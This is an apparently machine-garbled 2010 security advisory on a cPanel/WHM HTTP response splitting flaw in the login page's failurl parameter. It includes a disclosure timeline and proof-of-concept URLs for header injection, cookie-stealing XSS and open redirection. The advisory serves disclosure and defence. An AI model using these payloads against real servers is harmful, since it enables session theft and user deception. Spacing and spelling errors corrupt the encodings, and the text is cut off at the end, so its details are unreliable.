CPanel HTTP Response Splitting Vulnerability

Recognize-Security-cPanel HTTP Response Splitting Vulnerability

-----------------------------------------------------------------

Security Advisory by Trancer

January 21 2010

Http://www.rec-sec.com

"Hacking, however, is an art, not a science ."

Vendor

------

CPanel Inc.-http://www.cpanel.net

Vulnerability Information

-------------------------

Application description:

"CPanel is the industry leader for turning standalone servers into a fully automatic point-and-click hosting platform. Tedious tasks are

Replaced by web interfaces and API-based CILS. cPanel is designed with multiple levels of administration including admin, reseller, end

User, and email-based interfaces. These multiple levels provide security, lack of use, and flexibility for everyone from the server

Administrator to the email account user. "-cPanel website.

Remotely exploitable: Yes

Localy exploitable: No

Affected versions:

-CPanel 11.25 build 42174

-WHM (WebHost Manager) 11.25 build 42174

* Previous versions may also be affected.

Vulnerability Details

---------------------

An input validation problem exists within cPanel and WHM versions 11.25 (up to build 42174) which allows injecting CR (carriage return-% 0D

Or) and LF (line feed-% 0A or) characters into the server HTTP response header, resulting in a HTTP Response Splitting [1]

Vulnerability.

The vulnerability exists in the failurl parameter of cPanel login page. In a failed login attempt, the value of failurl returns to

Client in the Location HTTP header.

This vulnerability is possible because the application fails to validate user supplied input to failurl parameter, returning it un-sanitized

Within the server HTTP response header back to the client. This vulnerability not only gives attackers control of the remaining headers and

Body of the server response, but also allows them to create additional responses entirely under their control.

Attacker-supplied HTML or JavaScript code cocould run in the context of the affected site, potentially allowing an attacker to steal

Cookie-based authentication credentials, control how the site is rendered to the user, and influence or misrepresent how web content is

Served, cached, or interpreted. Other attacks are also possible.

CPanel Inc. patched the HTTP Response Splitting vulnerability in the latest versions (build 42213 up to 42483-latest version) of cPanel

And WHM, but an Open Redirection [2] [3] vulnerability still exist (see Disclosure Timeline ).

Proof-of-Concept

----------------

Header Injection ("Set-Cookie "):

Http://server.com: 2082/login /? User = foo & pass = bar & failurl = % 0D % 0ASet-Cookie % 3A % 20Rec = Sec

Server Response:

HTTP/1.1 307 Moved

Server: cpsrvd/11.25

Connection: close

Content-length: 105

Location:

Set-Cookie: Rec = Sec

Content-type: text/html

<Html>

Cross-Site Scripting:

Http://server.com: 2082/login /? User = foo & pass = bar & failurl = % 0D % 0AContent-Type: % 20 text/html % 0D % 0A % 0D % 0A % 3 Cscript % 3 Ealert % 28% 22Recognize-Security % 20-% 20% 22% 2Bdocument. cookie % 29; % 3C/script % 3E % 3C! --

Server Response:

HTTP/1.1 307 Moved

Server: cpsrvd/11.25

Connection: close

Content-length: 206

Location:

Content-Type: text/html

<Script> alert ("Recognize-Security-" + document. cookie); </script> <! --

Content-type: text/html

<Html>

Open Redirection:

Http://server.com: 2082/login /? User = foo & pass = bar & failurl = http://www.rec-sec.com

Server Response:

HTTP/1.1 307 Moved

Server: cpsrvd/11.25

Connection: close

Content-length: 106

Location: http://www.rec-sec.com

Content-type: text/html

<Html>

Discovery

---------

Moshe Ben Abu-Trancer

Recognize-Security

Mtrancer [AT_nospam] gmail.com

Http://www.rec-sec.com

Disclosure Timeline

-------------------

-16/12/2009-Recognize-Security notifies cPanel Security Team about an HTTP Response Splitting vulnerability discovered in cPanel and WHM

Version 11.25 build 42174, sending security advisory draft.

-17/12/2009-cPanel Security Team confirmed HTTP Response Splitting vulnerability, setting the release date of a patched version

January 1st, 2009.

-17/12/2009-Recognize-Security asks for further information regarding the exact version numbers of the vulnerable systems. Got no

Response.

-21/12/2009-cPanel Inc. release cPanel and WHM version 11.25.0 build 42213, fixing HTTP response splitting vulnerability.

-22/12/2009-Recognize-Security request status regarding the vulnerability from cPanel Security Team. Got no response.

-14/01/2010-Recognize-Security confirmed the HTTP Response Splitting vulnerability patched on the latest cPanel and WHM versions (build

42483) and find